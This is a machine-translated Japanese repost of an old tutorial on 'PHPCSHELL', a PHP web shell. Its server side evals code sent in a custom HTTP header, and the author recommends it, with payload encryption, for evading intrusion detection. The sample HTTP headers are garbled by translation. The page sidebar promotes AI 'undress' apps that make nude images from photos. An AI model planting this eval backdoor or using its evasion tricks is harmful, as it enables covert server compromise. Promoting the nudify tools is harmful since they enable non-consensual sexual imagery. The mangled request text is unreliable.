PHP C/S Shell_HTTP ヘッダーに基づく PHP チュートリアル
http://www.vul.kr/?p=455 著者:TTFCT
2006 年に、HTTP HEADER がカスタマイズできることを発見し、2006 年 8 月に PHPCSHELL C/S TOOL を完成させ、それ以来、このツールを使用して IDS を回避しました。 WSC POST の送信が正常に接続できないという問題があり、PHPCSHELL を使用して正常に接続しました。それ以来、それを使用しています。隠蔽性は非常に優れています。
ここまで述べたところで、PHPCSHELL の原理を説明します:
まずHTTPヘッダーを見てみましょう
GET / HTTP/1.1
受け入れる: image/gif、image/jpeg、image/pjpeg、application/x-ms-application、application/vnd.ms-xpsdocument、application/xaml+xml、application/x-ms- xbap、application/vnd.ms-excel、application/vnd.ms-powerpoint、application/msword、application/x-shockwave-flash、*/*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 ( MSIE 8.0; Trident/4.0; .NET CLR 3.0.30729;
エンコーディング: gzip、deflate : www.vul.kr
接続: Keep-Alive
Cookie: www.vul.kr
脆弱性: www.vul.kr へようこそ
GET / HTTP/1.1
受け入れる: image/gif、image/jpeg、image/pjpeg、application/x-ms-application、application/vnd.ms-xpsdocument、application/xaml+xml、application/x-ms- xbap、application/vnd.ms-excel、application/vnd.ms-powerpoint、application/msword、application/x-shockwave-flash、*/*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (互換性; MSIE 8.0; Trident/4.0; .NET CLR 3.0.30729; : www.vul.kr
脆弱性: www.vul.kr へようこそ
接続: キープアライブ
Cookie: websitecookie
サーバー側の受信コードは次のとおりです:
echo ($_SERVER[HTTP_Vulnerable]);
?>
HTTPパケットNCを送信すると、「www.vul.krへようこそ」が表示され、HTTPヘッダーにカスタマイズされた情報が取得されます。もちろん、HTTPのPOSTとGETのデータは1つの文にすることができます。 HEADER パケットが送信される これも可能で、一部の IDS をバイパスできるため、私は常に PHPCSHELL を使用しています。
eval($_SERVER[HTTP_Vulnerable]);?>
典型的な文になりましたか? :)
一部の IDS は非常に BT で、HTTP ヘッダーをチェックします。これを回避する方法はまだあります。パケットを暗号化し、実行する前にサーバー側で復号化します。
PHPCSHELL図、本当はWSCと同じ機能を持たせたかったのですが、作業量が多すぎて書く時間がありません。
追記: HTTP ヘッダーの送信には文字制限があり、許可される文字の長さは 8184 です。
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
AI Hentai Generator
AIヘンタイを無料で生成します。
人気の記事
ホットツール
メモ帳++7.3.1
使いやすく無料のコードエディター
SublimeText3 中国語版
中国語版、とても使いやすい
ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境
ドリームウィーバー CS6
ビジュアル Web 開発ツール
SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)
ホットトピック
7467
15
1376
52
77
11
19
20
Ubuntu および Debian 用の PHP 8.4 インストールおよびアップグレード ガイド
Dec 24, 2024 pm 04:42 PM
PHP 8.4 では、いくつかの新機能、セキュリティの改善、パフォーマンスの改善が行われ、かなりの量の機能の非推奨と削除が行われています。 このガイドでは、Ubuntu、Debian、またはその派生版に PHP 8.4 をインストールする方法、または PHP 8.4 にアップグレードする方法について説明します。
CakePHP について話し合う
Sep 10, 2024 pm 05:28 PM
CakePHP は、PHP 用のオープンソース フレームワークです。これは、アプリケーションの開発、展開、保守をより簡単にすることを目的としています。 CakePHP は、強力かつ理解しやすい MVC のようなアーキテクチャに基づいています。モデル、ビュー、コントローラー
CakePHP ファイルのアップロード
Sep 10, 2024 pm 05:27 PM
ファイルのアップロードを行うには、フォーム ヘルパーを使用します。ここではファイルアップロードの例を示します。
PHP 開発用に Visual Studio Code (VS Code) をセットアップする方法
Dec 20, 2024 am 11:31 AM
Visual Studio Code (VS Code とも呼ばれる) は、すべての主要なオペレーティング システムで利用できる無料のソース コード エディター (統合開発環境 (IDE)) です。 多くのプログラミング言語の拡張機能の大規模なコレクションを備えた VS Code は、
CakePHP クイックガイド
Sep 10, 2024 pm 05:27 PM
CakePHP はオープンソースの MVC フレームワークです。これにより、アプリケーションの開発、展開、保守がはるかに簡単になります。 CakePHP には、最も一般的なタスクの過負荷を軽減するためのライブラリが多数あります。
PHPでHTML/XMLを解析および処理するにはどうすればよいですか?
Feb 07, 2025 am 11:57 AM
このチュートリアルでは、PHPを使用してXMLドキュメントを効率的に処理する方法を示しています。 XML(拡張可能なマークアップ言語)は、人間の読みやすさとマシン解析の両方に合わせて設計された多用途のテキストベースのマークアップ言語です。一般的にデータストレージに使用されます
